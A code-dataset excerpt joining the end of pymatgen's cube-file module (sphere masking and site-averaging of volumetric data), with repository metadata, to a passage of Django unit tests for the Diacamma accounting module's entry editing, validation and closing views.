cx, cy, cz: (float) the fractional coordinates of the center of the sphere
"""
dx, dy, dz = (
np.floor(radius / np.linalg.norm(self.X)).astype(int),
np.floor(radius / np.linalg.norm(self.Y)).astype(int),
np.floor(radius / np.linalg.norm(self.Z)).astype(int),
)
gcd = max(np.gcd(dx, dy), np.gcd(dy, dz), np.gcd(dx, dz))
sx, sy, sz = dx // gcd, dy // gcd, dz // gcd
r = min(dx, dy, dz)
x0, y0, z0 = int(np.round(self.NX * cx)), int(np.round(self.NY * cy)), int(np.round(self.NZ * cz))
centerx, centery, centerz = self.NX // 2, self.NY // 2, self.NZ // 2
a = np.roll(self.data, (centerx - x0, centery - y0, centerz - z0))
i, j, k = np.indices(a.shape, sparse=True)
a = np.sqrt((sx * i - sx * centerx) ** 2 + (sy * j - sy * centery) ** 2 + (sz * k - sz * centerz) ** 2)
indices = a > r
a[indices] = 0
return a
def get_atomic_site_averages(self, atomic_site_radii):
"""
Get the average value around each atomic site.
Args:
atomic_site_radii (dict): dictionary determining the cutoff radius (in Angstroms)
for averaging around atomic sites (e.g. {'Li': 0.97, 'B': 0.77, ...}. If
not provided, then the
returns:
Array of site averages, [Average around site 1, Average around site 2, ...]
"""
return [self._get_atomic_site_average(s, atomic_site_radii[s.species_string]) for s in self.structure.sites]
def _get_atomic_site_average(self, site, radius):
"""
Helper function for get_atomic_site_averages.
Args:
site: Site in the structure around which to get the average
radius: (float) the atomic_site_radius (in Angstroms) for given atomic species
returns:
Average around the atomic site
"""
mask = self.mask_sphere(radius, *site.frac_coords)
return np.sum(self.data * mask) / np.count_nonzero(mask)
def get_atomic_site_totals(self, atomic_site_radii):
"""
Get the integrated total in a sphere around each atomic site.
Args:
atomic_site_radii (dict): dictionary determining the cutoff radius (in Angstroms)
for averaging around atomic sites (e.g. {'Li': 0.97, 'B': 0.77, ...}. If
not provided, then the
returns:
Array of site averages, [Average around site 1, Average around site 2, ...]
"""
return [self._get_atomic_site_total(s, atomic_site_radii[s.species_string]) for s in self.structure.sites]
def _get_atomic_site_total(self, site, radius):
"""
Helper function for get_atomic_site_averages.
Args:
site: Site in the structure around which to get the total
radius: (float) the atomic_site_radius (in Angstroms) for given atomic species
returns:
Average around the atomic site
"""
mask = self.mask_sphere(radius, *site.frac_coords)
return np.sum(self.data * mask)
def get_axis_grid(self, ind):
"""
Modified from pymatgen.io.vasp.outputs
Returns the grid for a particular axis.
Args:
ind (int): Axis index.
"""
ng = self.data.shape
num_pts = ng[ind]
lengths = self.structure.lattice.abc
return [i / num_pts * lengths[ind] for i in range(num_pts)]
def get_average_along_axis(self, ind):
"""
Modified from pymatgen.io.vasp.outputs
Get the averaged total of the volumetric data a certain axis direction.
For example, useful for visualizing Hartree Potentials.
Args:
ind (int): Index of axis.
Returns:
Average total along axis
"""
ng = self.data.shape
m = self.data
if ind == 0:
total = np.sum(np.sum(m, axis=1), 1)
elif ind == 1:
total = np.sum(np.sum(m, axis=0), 1)
else:
total = np.sum(np.sum(m, axis=0), 0)
return total / ng[(ind + 1) % 3] / ng[(ind + 2) % 3]
|
richardtran415/pymatgen
|
pymatgen/io/cube.py
|
Python
|
mit
| 9,239
|
[
"CPMD",
"Gaussian",
"VASP",
"pymatgen"
] |
abef95c451712ad3698ee388dad144c1f7e726a44ae8d0c417b19b78cc01f81a
|
# -*- coding: utf-8 -*-
'''
Describe test for Django
@author: Laurent GAY
@organization: sd-libre.fr
@contact: info@sd-libre.fr
@copyright: 2015 sd-libre.fr
@license: This file is part of Lucterios.
Lucterios is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Lucterios is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Lucterios. If not, see <http://www.gnu.org/licenses/>.
'''
from __future__ import unicode_literals
from shutil import rmtree
from datetime import date
from _io import StringIO
from lucterios.framework.test import LucteriosTest
from lucterios.framework.filetools import get_user_dir
from diacamma.accounting.views_entries import EntryAccountList, \
EntryAccountEdit, EntryAccountAfterSave, EntryLineAccountAdd, \
EntryLineAccountEdit, EntryAccountValidate, EntryAccountClose, \
EntryAccountReverse, EntryAccountCreateLinked, EntryAccountLink, \
EntryAccountDel, EntryAccountOpenFromLine, EntryAccountShow, \
EntryLineAccountDel, EntryAccountUnlock, EntryAccountImport
from diacamma.accounting.test_tools import default_compta_fr, initial_thirds_fr,\
fill_entries_fr, default_costaccounting, fill_thirds_fr, fill_accounts_fr
from diacamma.accounting.models import EntryAccount, CostAccounting, FiscalYear
from diacamma.accounting.views_other import CostAccountingAddModify
from diacamma.accounting.views import ThirdShow
from diacamma.accounting.views_accounts import FiscalYearBegin, FiscalYearClose,\
FiscalYearReportLastYear, ChartsAccountList
class EntryTest(LucteriosTest):
def setUp(self):
initial_thirds_fr()
LucteriosTest.setUp(self)
default_compta_fr()
rmtree(get_user_dir(), True)
def test_empty_list(self):
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList', {}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('', 8)
self.assert_json_equal('SELECT', 'year', '1')
self.assert_select_equal('year', 1) # nb=1
self.assert_json_equal('SELECT', 'journal', '4')
self.assert_select_equal('journal', 6) # nb=6
self.assert_json_equal('SELECT', 'filter', '1')
self.assert_select_equal('filter', 5) # nb=5
self.assert_count_equal('entryline', 0)
self.assert_json_equal('', '#entryline/headers/@5/@0', 'debit')
self.assert_json_equal('', '#entryline/headers/@5/@2', 'C2EUR')
self.assert_json_equal('', '#entryline/headers/@5/@4', '{[p align=\'right\']}{[font color="green"]}%s{[/font]}{[/p]};{[p align=\'right\']}{[font color="blue"]}%s{[/font]}{[/p]};')
self.assert_json_equal('', '#entryline/headers/@6/@0', 'credit')
self.assert_json_equal('', '#entryline/headers/@6/@2', 'C2EUR')
self.assert_json_equal('', '#entryline/headers/@6/@4', '{[p align=\'right\']}{[font color="green"]}%s{[/font]}{[/p]};{[p align=\'right\']}{[font color="blue"]}%s{[/font]}{[/p]};')
self.assert_json_equal('LABELFORM', 'result', [0.00, 0.00, 0.00, 0.00, 0.00])
def test_add_entry(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'year': '1', 'journal': '2'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 4)
self.assert_json_equal('SELECT', 'journal', '2')
self.assert_json_equal('DATE', 'date_value', '2015-12-31')
self.assert_json_equal('EDIT', 'designation', '')
self.assertEqual(len(self.json_actions), 2)
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountAfterSave")
self.assertEqual(len(self.response_json['action']['params']), 1)
self.assertEqual(self.response_json['action']['params']['entryaccount'], 1)
self.assertEqual(len(self.json_context), 4)
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
self.assertEqual(self.json_context['date_value'], "2015-02-13")
self.assertEqual(self.json_context['designation'], "un plein cadie")
self.factory.xfer = EntryAccountAfterSave()
self.calljson('/diacamma.accounting/entryAccountAfterSave', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie', 'entryaccount': "1"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountAfterSave')
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountEdit")
self.assertEqual(self.response_json['action']['params'], None)
self.assertEqual(len(self.json_context), 3)
self.assertEqual(self.json_context['entryaccount'], "1")
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
def test_add_entry_bad_date(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2017-04-20', 'designation': 'Truc'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.assertEqual(self.response_json['action']['params']['entryaccount'], 1)
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_json_equal('SELECT', 'journal', '2')
self.assert_json_equal('DATE', 'date_value', '2015-12-31')
self.assert_json_equal('EDIT', 'designation', 'Truc')
self.assertEqual(len(self.json_actions), 2)
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2010-04-20', 'designation': 'Machin'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.assertEqual(self.response_json['action']['params']['entryaccount'], 2)
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '2'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_json_equal('SELECT', 'journal', '2')
self.assert_json_equal('DATE', 'date_value', '2015-01-01')
self.assert_json_equal('EDIT', 'designation', 'Machin')
self.assertEqual(len(self.json_actions), 2)
def test_add_line_third(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_json_equal('SELECT', 'journal', '2')
self.assert_json_equal('DATE', 'date_value', '2015-02-13')
self.assert_json_equal('EDIT', 'designation', 'un plein cadie')
self.assert_count_equal('entrylineaccount_serial', 0)
self.assert_json_equal('EDIT', 'num_cpt_txt', '')
self.assert_json_equal('SELECT', 'num_cpt', 'None')
self.assert_select_equal('num_cpt', 0) # nb=0
self.assert_json_equal('FLOAT', 'debit_val', '0.00')
self.assert_json_equal('FLOAT', 'credit_val', '0.00')
self.assertEqual(len(self.json_actions), 2)
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'num_cpt_txt': '401'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 17)
self.assert_json_equal('EDIT', 'num_cpt_txt', '401')
self.assert_json_equal('SELECT', 'num_cpt', '4')
self.assert_select_equal('num_cpt', 1) # nb=1
self.assert_json_equal('FLOAT', 'debit_val', '0.00')
self.assert_json_equal('FLOAT', 'credit_val', '0.00')
self.assert_json_equal('SELECT', 'third', '0')
self.assert_json_equal('BUTTON', 'new-third', '')
self.assert_action_equal('POST', '#new-third/action', ('Créer', 'images/new.png', 'diacamma.accounting', 'thirdAdd', 0, 1, 1, {'new_account': '401'}))
self.assert_select_equal('third', 5) # nb=5
self.assert_count_equal('entrylineaccount_serial', 0)
self.assertEqual(len(self.json_actions), 2)
self.factory.xfer = EntryLineAccountAdd()
self.calljson('/diacamma.accounting/entryLineAccountAdd', {'year': '1', 'journal': '2', 'entryaccount': '1', 'num_cpt_txt': '401',
'num_cpt': '4', 'third': 0, 'debit_val': '0.0', 'credit_val': '152.34'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryLineAccountAdd')
self.assertEqual(len(self.json_context), 3)
self.assertEqual(self.json_context['entryaccount'], "1")
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-1|4|0|152.340000|0|0|None|"}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_count_equal('entrylineaccount_serial', 1)
self.assert_json_equal('', 'entrylineaccount_serial/@0/entry_account', '[401] 401')
self.assert_json_equal('', 'entrylineaccount_serial/@0/debit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@0/credit', 152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@0/reference', None)
self.assert_json_equal('', 'entrylineaccount_serial/@0/costaccounting', None)
self.assertEqual(len(self.json_actions), 2)
def test_add_line_revenue(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-1|4|0|152.340000|0|0|None|", 'num_cpt_txt': '60'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 16)
self.assert_count_equal('entrylineaccount_serial', 1)
self.assert_json_equal('EDIT', 'num_cpt_txt', '60')
self.assert_json_equal('SELECT', 'num_cpt', '11')
self.assert_select_equal('num_cpt', 4) # nb=4
self.assert_json_equal('FLOAT', 'debit_val', '152.34')
self.assert_json_equal('FLOAT', 'credit_val', '0.00')
self.assertEqual(len(self.json_actions), 2)
self.factory.xfer = EntryLineAccountAdd()
self.calljson('/diacamma.accounting/entryLineAccountAdd', {'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-1|4|0|152.340000|0|0|None|",
'num_cpt_txt': '60', 'num_cpt': '12', 'debit_val': '152.34', 'credit_val': '0.0'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryLineAccountAdd')
self.assertEqual(len(self.json_context), 3)
self.assertEqual(self.json_context['entryaccount'], '1')
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-1|4|0|152.340000|0|0|None|\n-2|12|0|152.340000|0|0|None|"}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_count_equal('entrylineaccount_serial', 2)
self.assert_json_equal('', 'entrylineaccount_serial/@0/entry_account', '[401] 401')
self.assert_json_equal('', 'entrylineaccount_serial/@0/debit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@0/credit', 152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@0/reference', None)
self.assert_json_equal('', 'entrylineaccount_serial/@0/costaccounting', None)
self.assert_json_equal('', 'entrylineaccount_serial/@1/entry_account', '[602] 602')
self.assert_json_equal('', 'entrylineaccount_serial/@1/costaccounting', None)
self.assert_json_equal('', 'entrylineaccount_serial/@1/debit', -152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@1/credit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@1/reference', None)
self.assertEqual(len(self.json_actions), 2)
self.assertEqual(self.json_actions[0]['id'], "diacamma.accounting/entryAccountValidate")
def test_add_line_payoff(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '3',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '3', 'entryaccount': '1', 'serial_entry': "-1|4|0|152.340000|0|0|None|", 'num_cpt_txt': '5'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 16)
self.assert_count_equal('entrylineaccount_serial', 1)
self.assert_json_equal('EDIT', 'num_cpt_txt', '5')
self.assert_json_equal('SELECT', 'num_cpt', '2')
self.assert_select_equal('num_cpt', 2) # nb=2
self.assert_json_equal('FLOAT', 'debit_val', '152.34')
self.assert_json_equal('FLOAT', 'credit_val', '0.00')
self.assert_json_equal('EDIT', 'reference', '')
self.assertEqual(len(self.json_actions), 2)
self.factory.xfer = EntryLineAccountAdd()
self.calljson('/diacamma.accounting/entryLineAccountAdd', {'year': '1', 'journal': '3', 'entryaccount': '1', 'serial_entry': "-1|4|0|152.340000|0|0|None|",
'num_cpt_txt': '5', 'num_cpt': '3', 'debit_val': '152.34', 'credit_val': '0.0', 'reference': 'aaabbb'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryLineAccountAdd')
self.assertEqual(len(self.json_context), 3)
self.assertEqual(self.json_context['entryaccount'], '1')
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "3")
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-1|4|0|152.340000|0|0|None|\n-2|3|0|152.340000|0|0|aaabbb|"}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_count_equal('entrylineaccount_serial', 2)
self.assert_json_equal('', 'entrylineaccount_serial/@0/entry_account', '[401] 401')
self.assert_json_equal('', 'entrylineaccount_serial/@0/debit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@0/credit', 152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@0/reference', None)
self.assert_json_equal('', 'entrylineaccount_serial/@0/costaccounting', None)
self.assert_json_equal('', 'entrylineaccount_serial/@1/entry_account', '[531] 531')
self.assert_json_equal('', 'entrylineaccount_serial/@1/debit', -152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@1/credit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@1/reference', 'aaabbb')
self.assert_json_equal('', 'entrylineaccount_serial/@1/costaccounting', None)
self.assertEqual(len(self.json_actions), 2)
self.assertEqual(self.json_actions[0]['id'], "diacamma.accounting/entryAccountValidate")
def test_change_line_third(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryLineAccountEdit()
self.calljson('/diacamma.accounting/entryLineAccountEdit', {'year': '1', 'journal': '2', 'entryaccount': '1',
'serial_entry': "-1|4|0|152.340000|0|0|None|\n-2|12|0|152.340000|0|0|None|", 'entrylineaccount_serial': '-1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryLineAccountEdit')
self.assert_count_equal('', 6)
self.assert_json_equal('LABELFORM', 'account', '[401] 401')
self.assert_json_equal('FLOAT', 'debit_val', '0.00')
self.assert_json_equal('FLOAT', 'credit_val', '152.34')
self.assert_json_equal('SELECT', 'third', '0')
self.assert_json_equal('BUTTON', 'new-third', '')
self.assert_action_equal('POST', '#new-third/action', ('Créer', 'images/new.png', 'diacamma.accounting', 'thirdAdd', 0, 1, 1, {'new_account': '401'}))
self.assert_select_equal('third', 5) # nb=5
self.assertEqual(self.json_actions[0]['id'], "diacamma.accounting/entryLineAccountAdd")
self.assertEqual(len(self.json_actions[0]['params']), 1)
self.assertEqual(self.json_actions[0]['params']['num_cpt'], 4)
self.factory.xfer = EntryLineAccountAdd()
self.calljson('/diacamma.accounting/entryLineAccountAdd', {'year': '1', 'journal': '2', 'entryaccount': '1',
'serial_entry': "-1|4|0|152.340000|0|0|None|\n-2|12|0|152.340000|0|0|None|", 'debit_val': '0.0',
'credit_val': '152.34', 'entrylineaccount_serial': '-1', 'third': '3', 'num_cpt': '4'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryLineAccountAdd')
self.assertEqual(len(self.json_context), 3)
self.assertEqual(self.json_context['entryaccount'], '1')
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-2|12|0|152.340000|0|0|None|\n-3|4|3|152.340000|0|0|None|"}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountEdit')
self.assert_count_equal('', 13)
self.assert_count_equal('entrylineaccount_serial', 2)
self.assert_json_equal('', 'entrylineaccount_serial/@0/entry_account', '[602] 602')
self.assert_json_equal('', 'entrylineaccount_serial/@0/debit', -152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@0/credit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@0/reference', None)
self.assert_json_equal('', 'entrylineaccount_serial/@0/costaccounting', None)
self.assert_json_equal('', 'entrylineaccount_serial/@1/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entrylineaccount_serial/@1/debit', 0)
self.assert_json_equal('', 'entrylineaccount_serial/@1/credit', 152.34)
self.assert_json_equal('', 'entrylineaccount_serial/@1/reference', None)
self.assert_json_equal('', 'entrylineaccount_serial/@1/costaccounting', None)
self.assertEqual(len(self.json_actions), 2)
self.assertEqual(self.json_actions[0]['id'], "diacamma.accounting/entryAccountValidate")
self.factory.xfer = EntryLineAccountEdit()
self.calljson('/diacamma.accounting/entryLineAccountEdit', {'year': '1', 'journal': '2', 'entryaccount': '1',
'serial_entry': "-1|4|3|152.340000|0|0|None|\n-2|12|0|152.340000|0|0|None|", 'entrylineaccount_serial': '-1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryLineAccountEdit')
self.assert_count_equal('', 6)
self.assert_json_equal('LABELFORM', 'account', '[401] 401')
self.assert_json_equal('FLOAT', 'debit_val', '0.00')
self.assert_json_equal('FLOAT', 'credit_val', '152.34')
self.assert_json_equal('SELECT', 'third', '3')
self.assert_json_equal('BUTTON', 'new-third', '')
self.assert_select_equal('third', 5) # nb=5
self.assertEqual(self.json_actions[0]['id'], "diacamma.accounting/entryLineAccountAdd")
self.assertEqual(len(self.json_actions[0]['params']), 1)
self.assertEqual(self.json_actions[0]['params']['num_cpt'], 4)
def test_edit_line(self):
CostAccounting.objects.create(name='close', description='Close cost', status=1, is_default=False)
CostAccounting.objects.create(name='open', description='Open cost', status=0, is_default=True)
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-1|4|2|87.230000|0|0|None|\n-2|11|0|87.230000|2|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryLineAccountEdit()
self.calljson('/diacamma.accounting/entryLineAccountEdit', {'year': 1, 'debit_val': 0, 'date_value': '2015-02-13', 'num_cpt_txt': '', 'credit_val': 0,
'entrylineaccount_serial': -2,
'serial_entry': '-1|4|2|87.230000|0|0|None|\n-2|11|0|87.230000|2|0|None|',
'journal': 2, 'designation': 'un plein cadie', 'entryaccount': '1'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryLineAccountEdit')
self.assert_count_equal('', 5)
self.assert_json_equal('LABELFORM', 'account', '[601] 601')
self.assert_json_equal('FLOAT', 'debit_val', '87.23')
self.assert_json_equal('FLOAT', 'credit_val', '0')
self.assert_json_equal('SELECT', 'costaccounting', '2')
self.assert_select_equal('costaccounting', 2) # nb=2
self.assertEqual(self.json_actions[0]['id'], "diacamma.accounting/entryLineAccountAdd")
self.assertEqual(len(self.json_actions[0]['params']), 1)
self.assertEqual(self.json_actions[0]['params']['num_cpt'], 11)
def test_change_line_payoff(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '3',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryLineAccountEdit()
self.calljson('/diacamma.accounting/entryLineAccountEdit', {'year': '1', 'journal': '3', 'entryaccount': '1', 'reference': '',
'serial_entry': "-1|4|0|152.340000|0|0|None|\n-2|3|0|152.340000|0|0|aaabbb|", 'entrylineaccount_serial': '-2'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryLineAccountEdit')
self.assert_count_equal('', 5)
self.assert_json_equal('LABELFORM', 'account', '[531] 531')
self.assert_json_equal('FLOAT', 'debit_val', '152.34')
self.assert_json_equal('FLOAT', 'credit_val', '0.00')
self.assert_json_equal('EDIT', 'reference', 'aaabbb')
self.assertEqual(self.json_actions[0]['id'], "diacamma.accounting/entryLineAccountAdd")
self.assertEqual(len(self.json_actions[0]['params']), 1)
self.assertEqual(self.json_actions[0]['params']['num_cpt'], 3)
self.factory.xfer = EntryLineAccountAdd()
self.calljson('/diacamma.accounting/entryLineAccountAdd', {'year': '1', 'journal': '3', 'entryaccount': '1',
'serial_entry': "-1|4|0|152.340000|0|0|None|\n-2|3|0|152.340000|0|0|aaabbb|", 'debit_val': '152.34',
'credit_val': '0.0', 'entrylineaccount_serial': '-2', 'reference': 'ccdd', 'num_cpt': '3'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryLineAccountAdd')
self.assertEqual(len(self.json_context), 3)
self.assertEqual(self.json_context['entryaccount'], '1')
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "3")
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountEdit")
self.assertEqual(len(self.response_json['action']['params']), 1)
serial_value = self.response_json['action']['params']['serial_entry']
self.assertEqual(serial_value[-25:], "|3|0|152.340000|0|0|ccdd|")
def test_valid_entry(self):
self.factory.xfer = EntryAccountEdit()
self.calljson('/diacamma.accounting/entryAccountEdit', {'SAVE': 'YES', 'year': '1', 'journal': '2',
'date_value': '2015-02-13', 'designation': 'un plein cadie'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountEdit')
self.factory.xfer = EntryAccountValidate()
self.calljson('/diacamma.accounting/entryAccountValidate',
{'year': '1', 'journal': '2', 'entryaccount': '1', 'serial_entry': "-2|12|0|152.340000|0|0|None|\n-3|4|3|152.340000|0|0|None|"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountValidate')
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList',
{'year': '1', 'journal': '2', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('', 8)
self.assert_count_equal('entryline', 2)
self.assert_json_equal('', 'entryline/@0/entry.num', None)
self.assert_json_equal('', 'entryline/@0/entry.date_entry', None)
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-02-13')
self.assert_json_equal('', 'entryline/@0/link', None)
self.assert_json_equal('', 'entryline/@0/costaccounting', None)
self.assert_json_equal('', 'entryline/@0/entry_account', '[401 Luke Lucky]')
self.assert_json_equal('', 'entryline/@0/credit', 152.34)
self.assert_json_equal('', 'entryline/@1/entry_account', '[602] 602')
self.assert_json_equal('', 'entryline/@1/link', None)
self.assert_json_equal('', 'entryline/@1/costaccounting', None)
self.assert_json_equal('LABELFORM', 'result', [0.00, 152.34, -152.34, 0.00, 0.00])
self.factory.xfer = EntryAccountOpenFromLine()
self.calljson('/diacamma.accounting/entryAccountOpenFromLine',
{'year': '1', 'journal': '2', 'filter': '0', 'entryline': '1'}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountOpenFromLine')
self.assertEqual(self.response_json['action']['id'], "diacamma.accounting/entryAccountEdit")
self.assertEqual(self.response_json['action']['params'], None)
self.assertEqual(len(self.json_context), 5)
self.assertEqual(self.json_context['filter'], "0")
self.assertEqual(self.json_context['year'], "1")
self.assertEqual(self.json_context['journal'], "2")
self.assertEqual(self.json_context['entryaccount'], 1)
self.factory.xfer = EntryAccountClose()
self.calljson('/diacamma.accounting/entryAccountClose',
{'CONFIRME': 'YES', 'year': '1', 'journal': '2', "entryline": "1"}, False)
self.assert_observer('core.acknowledge', 'diacamma.accounting', 'entryAccountClose')
self.factory.xfer = EntryAccountList()
self.calljson('/diacamma.accounting/entryAccountList',
{'year': '1', 'journal': '2', 'filter': '0'}, False)
self.assert_observer('core.custom', 'diacamma.accounting', 'entryAccountList')
self.assert_count_equal('', 8)
self.assert_count_equal('entryline', 2)
self.assert_json_equal('', 'entryline/@0/entry.num', '1')
self.assert_json_equal('', 'entryline/@0/entry.date_entry', date.today())
self.assert_json_equal('', 'entryline/@0/entry.date_value', '2015-02-13')
self.assert_json_equal('', 'entryline/@0/link', None)
